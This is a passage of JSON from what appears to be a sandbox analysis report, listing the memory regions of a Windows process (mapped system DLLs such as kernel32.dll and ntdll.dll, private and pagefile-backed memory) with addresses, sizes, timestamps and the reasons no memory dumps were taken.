"version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable" ], "ref_process_dump": null, "size": 421888, "start_va": 851968, "type": "region", "version": 1 }, "end_va": 1273855, "entry_point": 851968, "filename": "\\Windows\\System32\\locale.nls", "id": "region_1642", "name": "locale.nls", "norm_filename": "c:\\windows\\system32\\locale.nls", "region_type": "memory_mapped_file", "start_va": 851968, "timestamp": "00:02:07.870", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 8192, "start_va": 1310720, "type": "region", "version": 1 }, "end_va": 1318911, "entry_point": 0, "filename": null, "id": "region_1643", "name": "pagefile_0x0000000000140000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 1310720, "timestamp": "00:02:07.871", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 65536, "start_va": 1376256, "type": "region", "version": 1 }, "end_va": 1441791, "entry_point": 0, "filename": null, "id": "region_1644", "name": "private_0x0000000000150000", "norm_filename": null, "region_type": "private_memory", "start_va": 1376256, "timestamp": "00:02:07.872", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 4096, "start_va": 1441792, "type": "region", "version": 1 }, "end_va": 1445887, "entry_point": 0, "filename": null, "id": "region_1645", "name": "private_0x0000000000160000", "norm_filename": null, "region_type": "private_memory", "start_va": 1441792, "timestamp": "00:02:07.872", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 1048576, "start_va": 1507328, "type": "region", "version": 1 }, "end_va": 2555903, "entry_point": 0, "filename": null, "id": "region_1646", "name": "private_0x0000000000170000", "norm_filename": null, "region_type": "private_memory", "start_va": 1507328, "timestamp": "00:02:07.872", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 1048576, "start_va": 2555904, "type": "region", "version": 1 }, "end_va": 3604479, "entry_point": 0, "filename": null, "id": "region_1647", "name": "private_0x0000000000270000", "norm_filename": null, "region_type": "private_memory", "start_va": 2555904, "timestamp": "00:02:07.872", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 1605632, "start_va": 3604480, "type": "region", "version": 1 }, "end_va": 5210111, "entry_point": 0, "filename": null, "id": "region_1648", "name": "pagefile_0x0000000000370000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 3604480, "timestamp": "00:02:07.872", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 1576960, "start_va": 5242880, "type": "region", "version": 1 }, "end_va": 6819839, "entry_point": 0, "filename": null, "id": "region_1649", "name": "pagefile_0x0000000000500000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 5242880, "timestamp": "00:02:07.872", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "region_too_big" ], "info": "No dump was created because region size surpasses maximum region dump size of the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 20971520, "start_va": 6881280, "type": "region", "version": 1 }, "end_va": 27852799, "entry_point": 0, "filename": null, "id": "region_1650", "name": "pagefile_0x0000000000690000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 6881280, "timestamp": "00:02:07.874", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 4141056, "start_va": 27852800, "type": "region", "version": 1 }, "end_va": 31993855, "entry_point": 0, "filename": null, "id": "region_1651", "name": "pagefile_0x0000000001a90000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 27852800, "timestamp": "00:02:07.874", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 4096, "start_va": 32047104, "type": "region", "version": 1 }, "end_va": 32051199, "entry_point": 0, "filename": null, "id": "region_1652", "name": "private_0x0000000001e90000", "norm_filename": null, "region_type": "private_memory", "start_va": 32047104, "timestamp": "00:02:07.874", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 4096, "start_va": 32112640, "type": "region", "version": 1 }, "end_va": 32116735, "entry_point": 0, "filename": null, "id": "region_1653", "name": "pagefile_0x0000000001ea0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 32112640, "timestamp": "00:02:07.874", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 524288, "start_va": 32243712, "type": "region", "version": 1 }, "end_va": 32767999, "entry_point": 0, "filename": null, "id": "region_1654", "name": "private_0x0000000001ec0000", "norm_filename": null, "region_type": "private_memory", "start_va": 32243712, "timestamp": "00:02:07.874", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 524288, "start_va": 33030144, "type": "region", "version": 1 }, "end_va": 33554431, "entry_point": 0, "filename": null, "id": "region_1655", "name": "private_0x0000000001f80000", "norm_filename": null, "region_type": "private_memory", "start_va": 33030144, "timestamp": "00:02:07.874", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 524288, "start_va": 33685504, "type": "region", "version": 1 }, "end_va": 34209791, "entry_point": 0, "filename": null, "id": "region_1656", "name": "private_0x0000000002020000", "norm_filename": null, "region_type": "private_memory", "start_va": 33685504, "timestamp": "00:02:07.874", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 1048576, "start_va": 34209792, "type": "region", "version": 1 }, "end_va": 35258367, "entry_point": 0, "filename": null, "id": "region_1657", "name": "private_0x00000000020a0000", "norm_filename": null, "region_type": "private_memory", "start_va": 34209792, "timestamp": "00:02:07.874", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 913408, "start_va": 35258368, "type": "region", "version": 1 }, "end_va": 36171775, "entry_point": 0, "filename": null, "id": "region_1658", "name": "pagefile_0x00000000021a0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 35258368, "timestamp": "00:02:07.874", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable" ], "ref_process_dump": null, "size": 2945024, "start_va": 36831232, "type": "region", "version": 1 }, "end_va": 39776255, "entry_point": 36831232, "filename": "\\Windows\\Globalization\\Sorting\\SortDefault.nls", "id": "region_1659", "name": "sortdefault.nls", "norm_filename": "c:\\windows\\globalization\\sorting\\sortdefault.nls", "region_type": "memory_mapped_file", "start_va": 36831232, "timestamp": "00:02:07.875", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 524288, "start_va": 40370176, "type": "region", "version": 1 }, "end_va": 40894463, "entry_point": 0, "filename": null, "id": "region_1660", "name": "private_0x0000000002680000", "norm_filename": null, "region_type": "private_memory", "start_va": 40370176, "timestamp": "00:02:07.881", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 524288, "start_va": 41353216, "type": "region", "version": 1 }, "end_va": 41877503, "entry_point": 0, "filename": null, "id": "region_1661", "name": "private_0x0000000002770000", "norm_filename": null, "region_type": "private_memory", "start_va": 41353216, "timestamp": "00:02:07.881", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 524288, "start_va": 43253760, "type": "region", "version": 1 }, "end_va": 43778047, "entry_point": 0, "filename": null, "id": "region_1662", "name": "private_0x0000000002940000", "norm_filename": null, "region_type": "private_memory", "start_va": 43253760, "timestamp": "00:02:07.881", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 524288, "start_va": 43974656, "type": "region", "version": 1 }, "end_va": 44498943, "entry_point": 0, "filename": null, "id": "region_1663", "name": "private_0x00000000029f0000", "norm_filename": null, "region_type": "private_memory", "start_va": 43974656, "timestamp": "00:02:07.881", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1175552, "start_va": 1999765504, "type": "region", "version": 1 }, "end_va": 2000941055, "entry_point": 1999855264, "filename": "\\Windows\\System32\\kernel32.dll", "id": "region_1664", "name": "kernel32.dll", "norm_filename": "c:\\windows\\system32\\kernel32.dll", "region_type": "memory_mapped_file", "start_va": 1999765504, "timestamp": "00:02:07.881", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1024000, "start_va": 2000945152, "type": "region", "version": 1 }, "end_va": 2001969151, "entry_point": 2001052360, "filename": "\\Windows\\System32\\user32.dll", "id": "region_1665", "name": "user32.dll", "norm_filename": "c:\\windows\\system32\\user32.dll", "region_type": "memory_mapped_file", "start_va": 2000945152, "timestamp": "00:02:07.883", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1740800, "start_va": 2001993728, "type": "region", "version": 1 }, "end_va": 2003734527, "entry_point": 2001993728, "filename": "\\Windows\\System32\\ntdll.dll", "id": "region_1666", "name": "ntdll.dll", "norm_filename": "c:\\windows\\system32\\ntdll.dll", "region_type": "memory_mapped_file", "start_va": 2001993728, "timestamp": "00:02:07.885", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 1048576, "start_va": 2130575360, "type": "region", "version": 1 }, "end_va": 2131623935, "entry_point": 0, "filename": null, "id": "region_1667", "name": "pagefile_0x000000007efe0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 2130575360, "timestamp": "00:02:07.887", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "region_too_big" ], "info": "No dump was created because region size surpasses maximum region dump size of the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 15728640, "start_va": 2131623936, "type": "region", "version": 1 }, "end_va": 2147352575, "entry_point": 0, "filename": null, "id": "region_1668", "name": "private_0x000000007f0e0000", "norm_filename": null, "region_type": "private_memory", "start_va": 2131623936, "timestamp": "00:02:07.888", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable" ], "ref_process_dump": null, "size": 65536, "start_va": 2147352576, "type": "region", "version": 1 }, "end_va": 2147418111, "entry_point": 0, "filename": null, "id": "region_1669", "name": "private_0x000000007ffe0000", "norm_filename": null, "region_type": "private_memory", "start_va": 2147352576, "timestamp": "00:02:07.888", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 475136, "start_va": 4293066752, "type": "region", "version": 1 }, "end_va": 4293541887, "entry_point": 4293129292, "filename": "\\Windows\\System32\\taskeng.exe", "id": "region_1670", "name": "taskeng.exe", "norm_filename": "c:\\windows\\system32\\taskeng.exe", "region_type": "memory_mapped_file", "start_va": 4293066752, "timestamp": "00:02:07.888", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 36864, "start_va": 8791631527936, "type": "region", "version": 1 }, "end_va": 8791631564799, "entry_point": 8791631532448, "filename": "\\Windows\\System32\\TSChannel.dll", "id": "region_1671", "name": "tschannel.dll", "norm_filename": "c:\\windows\\system32\\tschannel.dll", "region_type": "memory_mapped_file", "start_va": 8791631527936, "timestamp": "00:02:07.890", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 98304, "start_va": 8791712858112, "type": "region", "version": 1 }, "end_va": 8791712956415, "entry_point": 8791712862512, "filename": "\\Windows\\System32\\dwmapi.dll", "id": "region_1672", "name": "dwmapi.dll", "norm_filename": "c:\\windows\\system32\\dwmapi.dll", "region_type": "memory_mapped_file", "start_va": 8791712858112, "timestamp": "00:02:07.892", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 352256, "start_va": 8791716921344, "type": "region", "version": 1 }, "end_va": 8791717273599, "entry_point": 8791716969408, "filename": "\\Windows\\System32\\uxtheme.dll", "id": "region_1673", "name": "uxtheme.dll", "norm_filename": "c:\\windows\\system32\\uxtheme.dll", "region_type": "memory_mapped_file", "start_va": 8791716921344, "timestamp": "00:02:07.894", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 217088, "start_va": 8791717838848, "type": "region", "version": 1 }, "end_va": 8791718055935, "entry_point": 8791717843044, "filename": "\\Windows\\System32\\xmllite.dll", "id": "region_1674", "name": "xmllite.dll", "norm_filename": "c:\\windows\\system32\\xmllite.dll", "region_type": "memory_mapped_file", "start_va": 8791717838848, "timestamp": "00:02:07.895", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 40960, "start_va": 8791718100992, "type": "region", "version": 1 }, "end_va": 8791718141951, "entry_point": 8791718110732, "filename": "\\Windows\\System32\\ktmw32.dll", "id": "region_1675", "name": "ktmw32.dll", "norm_filename": "c:\\windows\\system32\\ktmw32.dll", "region_type": "memory_mapped_file", "start_va": 8791718100992, "timestamp": "00:02:07.897", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 290816, "start_va": 8791741825024, "type": "region", "version": 1 }, "end_va": 8791742115839, "entry_point": 8791741829220, "filename": "\\Windows\\System32\\rsaenh.dll", "id": "region_1676", "name": "rsaenh.dll", "norm_filename": "c:\\windows\\system32\\rsaenh.dll", "region_type": "memory_mapped_file", "start_va": 8791741825024, "timestamp": "00:02:07.899", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 94208, "start_va": 8791746347008, "type": "region", "version": 1 }, "end_va": 8791746441215, "entry_point": 8791746359992, "filename": "\\Windows\\System32\\cryptsp.dll", "id": "region_1677", "name": "cryptsp.dll", "norm_filename": "c:\\windows\\system32\\cryptsp.dll", "region_type": "memory_mapped_file", "start_va": 8791746347008, "timestamp": "00:02:07.900", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 446464, "start_va": 8791747395584, "type": "region", "version": 1 }, "end_va": 8791747842047, "entry_point": 8791747399696, "filename": "\\Windows\\System32\\wevtapi.dll", "id": "region_1678", "name": "wevtapi.dll", "norm_filename": "c:\\windows\\system32\\wevtapi.dll", "region_type": "memory_mapped_file", "start_va": 8791747395584, "timestamp": "00:02:07.903", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 151552, "start_va": 8791751196672, "type": "region", "version": 1 }, "end_va": 8791751348223, "entry_point": 8791751235160, "filename": "\\Windows\\System32\\sspicli.dll", "id": "region_1679", "name": "sspicli.dll", "norm_filename": "c:\\windows\\system32\\sspicli.dll", "region_type": "memory_mapped_file", "start_va": 8791751196672, "timestamp": "00:02:07.905", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 61440, "start_va": 8791751393280, "type": "region", "version": 1 }, "end_va": 8791751454719, "entry_point": 8791751397392, "filename": "\\Windows\\System32\\cryptbase.dll", "id": "region_1680", "name": "cryptbase.dll", "norm_filename": "c:\\windows\\system32\\cryptbase.dll", "region_type": "memory_mapped_file", "start_va": 8791751393280, "timestamp": "00:02:07.907", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 81920, "start_va": 8791752376320, "type": "region", "version": 1 }, "end_va": 8791752458239, "entry_point": 8791752380640, "filename": "\\Windows\\System32\\RpcRtRemote.dll", "id": "region_1681", "name": "rpcrtremote.dll", "norm_filename": "c:\\windows\\system32\\rpcrtremote.dll", "region_type": "memory_mapped_file", "start_va": 8791752376320, "timestamp": "00:02:07.909", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 438272, "start_va": 8791754539008, "type": "region", "version": 1 }, "end_va": 8791754977279, "entry_point": 8791754551520, "filename": "\\Windows\\System32\\KernelBase.dll", "id": "region_1682", "name": "kernelbase.dll", "norm_filename": "c:\\windows\\system32\\kernelbase.dll", "region_type": "memory_mapped_file", "start_va": 8791754539008, "timestamp": "00:02:07.911", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1232896, "start_va": 8791756505088, "type": "region", "version": 1 }, "end_va": 8791757737983, "entry_point": 8791756827984, "filename": "\\Windows\\System32\\rpcrt4.dll", "id": "region_1683", "name": "rpcrt4.dll", "norm_filename": "c:\\windows\\system32\\rpcrt4.dll", "region_type": "memory_mapped_file", "start_va": 8791756505088, "timestamp": "00:02:07.912", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 626688, "start_va": 8791757750272, "type": "region", "version": 1 }, "end_va": 8791758376959, "entry_point": 8791757757456, "filename": "\\Windows\\System32\\clbcatq.dll", "id": "region_1684", "name": "clbcatq.dll", "norm_filename": "c:\\windows\\system32\\clbcatq.dll", "region_type": "memory_mapped_file", "start_va": 8791757750272, "timestamp": "00:02:07.913", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 188416, "start_va": 8791758405632, "type": "region", "version": 1 }, "end_va": 8791758594047, "entry_point": 8791758409744, "filename": "\\Windows\\System32\\imm32.dll", "id": "region_1685", "name": "imm32.dll", "norm_filename": "c:\\windows\\system32\\imm32.dll", "region_type": "memory_mapped_file", "start_va": 8791758405632, "timestamp": "00:02:07.915", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 897024, "start_va": 8791759257600, "type": "region", "version": 1 }, "end_va": 8791760154623, "entry_point": 8791759390560, "filename": "\\Windows\\System32\\advapi32.dll", "id": "region_1686", "name": "advapi32.dll", "norm_filename": "c:\\windows\\system32\\advapi32.dll", "region_type": "memory_mapped_file", "start_va": 8791759257600, "timestamp": "00:02:07.916", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 421888, "start_va": 8791761747968, "type": "region", "version": 1 }, "end_va": 8791762169855, "entry_point": 8791761793084, "filename": "\\Windows\\System32\\gdi32.dll", "id": "region_1687", "name": "gdi32.dll", "norm_filename": "c:\\windows\\system32\\gdi32.dll", "region_type": "memory_mapped_file", "start_va": 8791761747968, "timestamp": "00:02:07.917", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1085440, "start_va": 8791762206720, "type": "region", "version": 1 }, "end_va": 8791763292159, "entry_point": 8791762210916, "filename": "\\Windows\\System32\\msctf.dll", "id": "region_1688", "name": "msctf.dll", "norm_filename": "c:\\windows\\system32\\msctf.dll", "region_type": "memory_mapped_file", "start_va": 8791762206720, "timestamp": "00:02:07.919", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 823296, "start_va": 8791763320832, "type": "region", "version": 1 }, "end_va": 8791764144127, "entry_point": 8791763822708, "filename": "\\Windows\\System32\\usp10.dll", "id": "region_1689", "name": "usp10.dll", "norm_filename": "c:\\windows\\system32\\usp10.dll", "region_type": "memory_mapped_file", "start_va": 8791763320832, "timestamp": "00:02:07.920", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 651264, "start_va": 8791778394112, "type": "region", "version": 1 }, "end_va": 8791779045375, "entry_point": 8791778403744, "filename": "\\Windows\\System32\\msvcrt.dll", "id": "region_1690", "name": "msvcrt.dll", "norm_filename": "c:\\windows\\system32\\msvcrt.dll", "region_type": "memory_mapped_file", "start_va": 8791778394112, "timestamp": "00:02:07.927", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 2109440, "start_va": 8791779049472, "type": "region", "version": 1 }, "end_va": 8791781158911, "entry_point": 8791779193648, "filename": "\\Windows\\System32\\ole32.dll", "id": "region_1691", "name": "ole32.dll", "norm_filename": "c:\\windows\\system32\\ole32.dll", "region_type": "memory_mapped_file", "start_va": 8791779049472, "timestamp": "00:02:07.928", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 462848, "start_va": 8791784095744, "type": "region", "version": 1 }, "end_va": 8791784558591, "entry_point": 8791784168992, "filename": "\\Windows\\System32\\shlwapi.dll", "id": "region_1692", "name": "shlwapi.dll", "norm_filename": "c:\\windows\\system32\\shlwapi.dll", "region_type": "memory_mapped_file", "start_va": 8791784095744, "timestamp": "00:02:07.929", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 57344, "start_va": 8791784620032, "type": "region", "version": 1 }, "end_va": 8791784677375, "entry_point": 8791784624256, "filename": "\\Windows\\System32\\lpk.dll", "id": "region_1693", "name": "lpk.dll", "norm_filename": "c:\\windows\\system32\\lpk.dll", "region_type": "memory_mapped_file", "start_va": 8791784620032, "timestamp": "00:02:07.930", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 126976, "start_va": 8791787241472, "type": "region", "version": 1 }, "end_va": 8791787368447, "entry_point": 8791787266280, "filename": "\\Windows\\System32\\sechost.dll", "id": "region_1694", "name": "sechost.dll", "norm_filename": "c:\\windows\\system32\\sechost.dll", "region_type": "memory_mapped_file", "start_va": 8791787241472, "timestamp": "00:02:07.931", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 880640, "start_va": 8791787372544, "type": "region", "version": 1 }, "end_va": 8791788253183, "entry_point": 8791787385460, "filename": "\\Windows\\System32\\oleaut32.dll", "id": "region_1695", "name": "oleaut32.dll", "norm_filename": "c:\\windows\\system32\\oleaut32.dll", "region_type": "memory_mapped_file", "start_va": 8791787372544, "timestamp": "00:02:07.931", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 4096, "start_va": 8791790059520, "type": "region", "version": 1 }, "end_va": 8791790063615, "entry_point": 8791790059520, "filename": "\\Windows\\System32\\apisetschema.dll", "id": "region_1696", "name": "apisetschema.dll", "norm_filename": "c:\\windows\\system32\\apisetschema.dll", "region_type": "memory_mapped_file", "start_va": 8791790059520, "timestamp": "00:02:07.932", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 143360, "start_va": 8796092694528, "type": "region", "version": 1 }, "end_va": 8796092837887, "entry_point": 0, "filename": null, "id": "region_1697", "name": "pagefile_0x000007fffffb0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 8796092694528, "timestamp": "00:02:07.936", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 8192, "start_va": 8796092837888, "type": "region", "version": 1 }, "end_va": 8796092846079, "entry_point": 0, "filename": null, "id": "region_1698", "name": "private_0x000007fffffd3000", "norm_filename": null, "region_type": "private_memory", "start_va": 8796092837888, "timestamp": "00:02:07.936", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 8192, "start_va": 8796092846080, "type": "region", "version": 1 }, "end_va": 8796092854271, "entry_point": 0, "filename": null, "id": "region_1699", "name": "private_0x000007fffffd5000", "norm_filename": null, "region_type": "private_memory", "start_va": 8796092846080, "timestamp": "00:02:07.936", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 8192, "start_va": 8796092854272, "type": "region", "version": 1 }, "end_va": 8796092862463, "entry_point": 0, "filename": null, "id": "region_1700", "name": "private_0x000007fffffd7000", "norm_filename": null, "region_type": "private_memory", "start_va": 8796092854272, "timestamp": "00:02:07.936", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 8192, "start_va": 8796092862464, "type": "region", "version": 1 }, "end_va": 8796092870655, "entry_point": 0, "filename": null, "id": "region_1701", "name": "private_0x000007fffffd9000", "norm_filename": null, "region_type": "private_memory", "start_va": 8796092862464, "timestamp": "00:02:07.936", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 8192, "start_va": 8796092870656, "type": "region", "version": 1 }, "end_va": 8796092878847, "entry_point": 0, "filename": null, "id": "region_1702", "name": "private_0x000007fffffdb000", "norm_filename": null, 